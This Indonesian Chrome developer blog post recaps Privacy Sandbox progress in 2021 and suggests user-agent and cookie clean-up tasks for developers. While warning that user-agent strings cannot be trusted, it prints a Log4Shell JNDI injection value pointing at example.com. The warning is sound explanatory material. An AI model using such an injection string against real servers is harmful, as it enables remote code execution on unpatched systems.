Selamat datang di Progress in the Privacy Sandbox edisi rangkuman 2021, yang melacak pencapaian dalam jalur penghentian cookie pihak ketiga di Chrome dan mengupayakan web yang lebih pribadi. Biasanya, kami membagikan ringkasan pembaruan pada linimasa Privacy Sandbox bersama dengan berita dari seluruh project, tetapi Desember adalah bulan yang tenang. Sebagai gantinya, kita akan melihat kembali beberapa aktivitas selama tahun 2021 dan memberikan beberapa kemungkinan resolusi yang dapat Anda buat sekarang di tahun baru.
Proses pengembangan Chromium
Agar fitur platform web baru muncul di Chromium, fitur tersebut perlu melalui proses pengembangan terbuka project. Pada tahun 2021, tim Privacy Sandbox menghasilkan:
| 🥚 | Maksud untuk Membuat Prototipe | 19 |
| 🧪 | Tujuan untuk Bereksperimen | 7 |
| 🚀 | Tujuan Pengiriman | 11 |
Setiap pencapaian juga merupakan undangan bagi ekosistem web yang lebih luas untuk berkontribusi.
Intent untuk Membuat Prototipe adalah checkpoint pertama tempat kami mengundang diskusi dan eksperimen awal. Artinya, proposal akan tersedia di GitHub, sehingga Anda dapat mengajukan pertanyaan dengan membuat Issue atau bergabung dalam diskusi dan presentasi dalam grup standar seperti W3C dan IETF. Di sinilah coding dimulai, yang berarti Anda dapat mengharapkan fungsi prototipe tersedia untuk pengujian developer di balik tanda fitur. Masukan awal sangat penting untuk memvalidasi dan melakukan iterasi proposal.
Intent to Experiment adalah langkah opsional jika kita ingin meminta uji coba origin. Developer dapat mendaftar ke uji coba origin suatu fitur, lalu mengujinya dalam produksi. Ini disebut eksperimen karena memiliki aspek tertentu dari fitur yang ingin kita validasi di lingkungan dunia nyata. Developer yang dapat menguji dan membagikan hasil pengujian tersebut akan memberikan masukan yang berharga untuk membantu melakukan iterasi dan mengembangkan fitur.
Intent to Ship adalah pencapaian akhir yang menandakan bahwa fitur kini selesai dan siap untuk ketersediaan umum. Setelah disetujui, fitur ini digabungkan ke dalam rilis mendatang, lalu dilanjutkan melalui saluran Canary, Beta, dan Stabil. Sangat penting untuk memastikan Anda menguji situs dengan Chrome versi Canary dan Beta untuk menemukan dan melaporkan bug sebelum fitur mencapai Stabil.
Proposal
Setiap proposal Privacy Sandbox memiliki repositori GitHub yang menyertainya. Repositori menghosting penjelasan untuk meringkas fungsi secara keseluruhan, spesifikasi mendetail untuk penerapan oleh browser, dan kontribusi dari seluruh ekosistem web dalam bentuk Masalah dan Permintaan Pull.
Di 14 repositori Privacy Sandbox, kami memiliki:
| 💬 | 545 | Masalah dibuat |
| 250 | Masalah ditutup | |
| 🛠️ | 261 | Permintaan Pull dibuat |
| 223 | Permintaan Pull digabungkan |
Bahasa dalam penjelasan dan spesifikasi sering kali ditargetkan untuk audiens yang sudah memahami standar dan pengembangan browser, dan hal ini dapat menantang jika Anda tidak terbiasa dengannya. Namun, tujuan dari penjelasan adalah untuk menjelaskan. Jika ada poin yang tidak jelas atau tidak tercakup, kami ingin Anda melaporkan Masalah agar kami dapat memperbarui dan memperjelas penjelasannya.
Resolusi
Pembersihan musim semi agen pengguna
Selagi mendekati Tahun Baru, kami juga menghitung naik ke Chrome 100 dan pengurangan string agen pengguna secara bertahap. Ini adalah motivator yang baik untuk meninjau kembali penggunaan string agen pengguna dalam kode Anda untuk memeriksa apakah string tersebut terpengaruh oleh salah satu perubahan ini.
Untuk menemukan area tersebut:
- Telusuri
navigator.userAgentdi kode JavaScript Anda, atau akses ke headerUser-Agentdi kode server Anda. - Periksa penguraian string untuk asumsi tentang versi 2 digit. Misalnya, ekspresi reguler yang menentukan
\d\datau\d{2}harus diganti dengan\d+. - Periksa penggunaan string ini di mana pun Anda mengandalkan:
- versi platform (sistem operasi)
- versi build Chrome lengkap
- nama perangkat seluler
- Ini adalah nilai yang akan dikurangi menjadi string tetap di masa mendatang. Jika Anda memerlukan akses ke nilai ini, migrasikan ke Petunjuk Klien Agen Pengguna.
Ada satu pembaruan pada bulan Desember yang perlu disebutkan. Jika Anda mengadopsi Petunjuk Klien Agen Pengguna, kami telah mengirimkan Intent to Ship guna mengaktifkan pendelegasian petunjuk ke origin lain di HTML melalui tag <meta>. Contoh:
<meta name="accept-ch" content="sec-ch-ua-model=( https://foo.bar )">
Jika Anda bersemangat untuk membersihkan musim semi, Anda juga dapat mempertimbangkan alternatif penggunaan agen pengguna sepenuhnya. Jika Anda menggunakan string ini untuk mendeteksi perangkat seluler, selidiki apakah Anda dapat menggantinya dengan desain responsif. Jika Anda memeriksa nama dan versi browser untuk dukungan fitur, lihat apakah Anda dapat menggunakan deteksi fitur atau tidak.
Perlu selalu diingat bahwa agen pengguna, seperti nilai yang diberikan klien, tidak dijamin akurat atau bahkan diberikan. Kerentanan Log4j, "Log4shell" terbaru adalah contoh risiko ini. Klien yang menetapkan string agen penggunanya untuk
menyertakan nilai seperti ${jndi:ldap://example.com/file} mungkin bisa membuat situs
secara aktif mengurai nilai tersebut di server.
Pembuatan katalog cookie
Aktivitas tahun baru tradisional lainnya adalah memastikan Anda merasa
senang karena memiliki kue dalam jumlah yang sehat dengan bahan-bahan berkualitas. Selagi kami terus beralih
ke penghentian cookie pihak ketiga, Anda harus memastikan bahwa Anda mengetahui
cookie situs mana yang akan terpengaruh. Tahun 2020 menjadi awal karena
diperlukan untuk menandai semua cookie untuk penggunaan lintas situs atau
pihak ketiga
dengan SameSite=None.
Setiap cookie yang atribut SameSite-nya telah Anda tetapkan ke None perlu diupdate.
Ada tiga kemungkinan rute untuk dipertimbangkan saat ini:
- Jika cookie hanya diperlukan dalam hubungan 1:1 dengan situs tingkat atas,
ikuti progres proposal
CHIPS. Hal ini berarti menambahkan
atribut
Partitionedke cookie. - Jika cookie digunakan dalam konteks lintas situs, tetapi hanya di seluruh situs yang Anda miliki dan operasikan, cookie tersebut dapat menjadi kandidat untuk Kumpulan Pihak Pertama. Hal ini memerlukan penentuan
situs dalam kumpulan dan penambahan atribut
SamePartyke cookie. - Jika cookie digunakan untuk memberikan beberapa bentuk nilai bersama di beberapa situs, selidiki kumpulan proposal Privacy Sandbox yang lebih luas untuk solusi alternatif yang tidak mengandalkan pelacakan lintas situs.
Jika Anda merasa sangat sadar kesehatan, ini juga saat yang tepat untuk meninjau kembali semua penggunaan cookie Anda, karena kami juga memiliki resep yang baik untuk meningkatkan cookie pihak pertama Anda.
Masukan
Seiring upaya kami untuk terus memublikasikan update bulanan ini dan mengembangkan Privacy Sandbox secara keseluruhan, kami ingin memastikan bahwa developer menerima informasi dan dukungan yang mereka butuhkan. Beri tahu kami melalui @ChromiumDev Twitter jika ada hal yang dapat kami tingkatkan dalam seri ini. Kami akan menggunakan masukan Anda untuk terus meningkatkan format.
Lihat FAQ Privacy Sandbox, yang terus kami perluas berdasarkan masalah yang Anda kirimkan ke repo dukungan developer. Jika ada pertanyaan seputar pengujian atau penerapan pada proposal apa pun, hubungi kami.